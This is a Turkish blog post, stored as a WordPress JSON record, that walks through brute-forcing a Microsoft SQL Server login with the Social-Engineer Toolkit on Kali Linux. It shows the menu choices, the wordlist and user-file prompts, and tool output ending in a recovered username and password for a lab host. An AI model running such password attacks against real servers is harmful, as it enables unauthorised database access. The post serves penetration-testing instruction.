{"id":979,"date":"2015-08-27T10:41:01","date_gmt":"2015-08-27T08:41:01","guid":{"rendered":"http:\/\/www.ayhanarda.com\/blog\/?p=979"},"modified":"2015-08-27T10:41:01","modified_gmt":"2015-08-27T08:41:01","slug":"setoolkit-ile-mssql-sifresi-bulma","status":"publish","type":"post","link":"https:\/\/www.ayhanarda.com\/blog\/2015\/08\/setoolkit-ile-mssql-sifresi-bulma\/","title":{"rendered":"Setoolkit ile Mssql \u015eifresi Bulma"},"content":{"rendered":"

Setoolkit i genellikle phishing sayfalar\u0131 i\u00e7in mi kullan\u0131yorsunuz , setoolkit ile mssql \u015fifresi bulmaya ne dersiniz? Yine bu i\u015flem i\u00e7in setoolkit in haz\u0131r kurulu geldi\u011fi kali linux da\u011f\u0131t\u0131m\u0131n\u0131 kullan\u0131yorum , setoolkit i a\u00e7mak ile ba\u015flayal\u0131m.<\/p>\n

root@ayhanarda:\/# setoolkit<\/strong><\/p>\n

Kar\u015f\u0131m\u0131za bir men\u00fc gelecek.<\/p>\n

1) Social-Engineering Attacks
\n2) Fast-Track Penetration Testing<\/strong>
\n3) Third Party Modules
\n4) Update the Social-Engineer Toolkit
\n5) Update SET configuration
\n6) Help, Credits, and About<\/p>\n

99) Exit the Social-Engineer Toolkit<\/p>\n

Mssql \u015fifre denemeleri yapmas\u0131 i\u00e7in 2<\/strong> numaral\u0131 se\u00e7enek ile devam ediyoruz ve a\u015fa\u011f\u0131daki men\u00fcye ula\u015f\u0131yoruz.<\/p>\n

1) Microsoft SQL Bruter<\/strong>
\n2) Custom Exploits
\n3) SCCM Attack Vector
\n4) Dell DRAC\/Chassis Default Checker
\n5) RID_ENUM – User Enumeration Attack
\n6) PSEXEC Powershell Injection<\/p>\n

99) Return to Main Menu<\/p>\n

Yukar\u0131da a\u00e7\u0131lan men\u00fcde 1<\/strong> nolu se\u00e7enek ile devam edelim ve a\u015fa\u011f\u0131daki men\u00fcye ula\u015fal\u0131m.<\/p>\n

1) Scan and Attack MSSQL<\/strong>
\n2) Connect directly to MSSQL<\/p>\n

99) Return to Main Menu<\/p>\n

Yukar\u0131daki men\u00fcde 1<\/strong> nolu se\u00e7enek ile devam edelim ve a\u015fa\u011f\u0131daki men\u00fcye ula\u015fal\u0131m.<\/p>\n

1. Scan IP address or CIDR
\n2. Import file that contains SQL Server IP addresses<\/strong><\/p>\n

\u015eimdi yukar\u0131da diyor ki , ben network teki ip adreslerini mi taray\u0131p sql kurulu sunucu bulay\u0131m yoksa sen mi deneme yapmak istedi\u011fin sql server ip adresini bir dosyaya yaz\u0131p bana s\u00f6ylemek istersin , ben burada 2<\/strong> nolu se\u00e7enek ile devam edece\u011fim. Mssql server ip adresinin 192.168.1.15 oldu\u011funu varsayal\u0131m ve mssql portu 1433 olsun , olu\u015fturaca\u011f\u0131m\u0131z dosya i\u00e7eri\u011fi a\u015fa\u011f\u0131daki gibi olmal\u0131.<\/p>\n

root@ayhanarda:~# cat \/root\/sql.txt<\/strong>
\n192.168.1.15:1433<\/p>\n

Dosyam\u0131z haz\u0131r ise 2<\/strong> nolu se\u00e7ene\u011fi se\u00e7tikten sonra a\u015fa\u011f\u0131daki b\u00f6l\u00fcm a\u00e7\u0131lacak ve bizden dosyan\u0131n yolunu isteyecek.\u00d6rnekteki gibi yazabilirsiniz.<\/p>\n

set:fasttrack:mssql:scan> Enter filename for SQL servers (ex. \/root\/sql.txt – note can be in format of ipaddr:port):\/root\/sql.txt<\/strong><\/p>\n

Dosya yolunu yazd\u0131ktan sonra denemek i\u00e7in bir \u015fifre listemiz olup olmad\u0131\u011f\u0131n\u0131 soracakt\u0131r , e\u011fer var ise yolunu belirtebilirsiniz , yok ise kendisi i\u00e7inde tan\u0131ml\u0131 \u015fifreleri s\u0131ras\u0131 ile deneyecektir , ben daha kolay bulabilmesi i\u00e7in bir sqlsifre.txt dosyas\u0131 haz\u0131rlad\u0131m ve i\u00e7ine do\u011fru olmayan \u015fifrelerin yan\u0131nda bir de do\u011frusunu koydum.<\/p>\n

\u015eifre dosyas\u0131 yolu belirttikten sonra k.adlar\u0131n\u0131 i\u00e7eren dosya yolunu soracakt\u0131r , yukar\u0131daki paragraf\u0131 tekrar inceleyebilirsiniz , e\u011fer dosya belirtmez iseniz sa<\/strong> kullan\u0131c\u0131 ad\u0131 ile deneyecektir. Bu i\u015flemden sonra enter a bast\u0131\u011f\u0131n\u0131zda hemen \u00e7al\u0131\u015fmaya ba\u015flayacak ve a\u015fa\u011f\u0131daki gibi sonu\u00e7 \u00fcretecektir.<\/p>\n

set:fasttrack:mssql:scan> Enter filename for SQL servers (ex. \/root\/sql.txt – note can be in format of ipaddr:port):\/root\/sql.txt<\/strong>
\nset:fasttrack:mssql:scan> Enter path to a wordlist file [use default wordlist]:\/root\/sqlsifre.txt<\/strong>
\nset:fasttrack:mssql:scan> Enter the username to brute force or specify username file (\/root\/users.txt) [sa]:\/root\/user.lst\u00a0<\/strong>
\nAttempting to brute force\u00a0 with username of admin and password of password
\nAttempting to brute force\u00a0 with username of admin and password of deneme
\nAttempting to brute force\u00a0 with username of admin and password of selambensifre
\n[!] Unable to guess the SQL password for 192.168.1.15 with username of admin
\nAttempting to brute force\u00a0 with username of root and password of password
\nAttempting to brute force\u00a0 with username of root and password of deneme
\nAttempting to brute force\u00a0 with username of root and password of selambensifre
\n[!] Unable to guess the SQL password for 192.168.1.15 with username of root
\nAttempting to brute force\u00a0 with username of selambenkullaniciadi and password of password
\nAttempting to brute force\u00a0 with username of selambenkullaniciadi and password of deneme
\nAttempting to brute force\u00a0 with username of selambenkullaniciadi and password of selambensifre
\n[*]
\nSuccessful login with username selambenkullaniciadi and password: selambensifre<\/strong>
\nAttempting to brute force\u00a0 with username of ayhan_user and password of password
\nAttempting to brute force\u00a0 with username of ayhan_user and password of deneme
\nAttempting to brute force\u00a0 with username of ayhan_user and password of selambensifre
\n[!] Unable to guess the SQL password for 192.168.1.15 with username of ayhan_user
\n[*] Select the compromise SQL server you want to interact with:<\/p>\n

1. 192.168.1.15\u00a0\u00a0 username: selambenkullaniciadi | password: selambensifre\u00a0\u00a0 SQLPort: 1433<\/strong><\/p>\n

99. Return back to the main menu.<\/p>\n

G\u00f6r\u00fcld\u00fc\u011f\u00fc \u00fczere \u015fifre yukar\u0131da belirtilmi\u015ftir.<\/p>\n

Ayhan ARDA<\/p>\n

\"Share<\/a>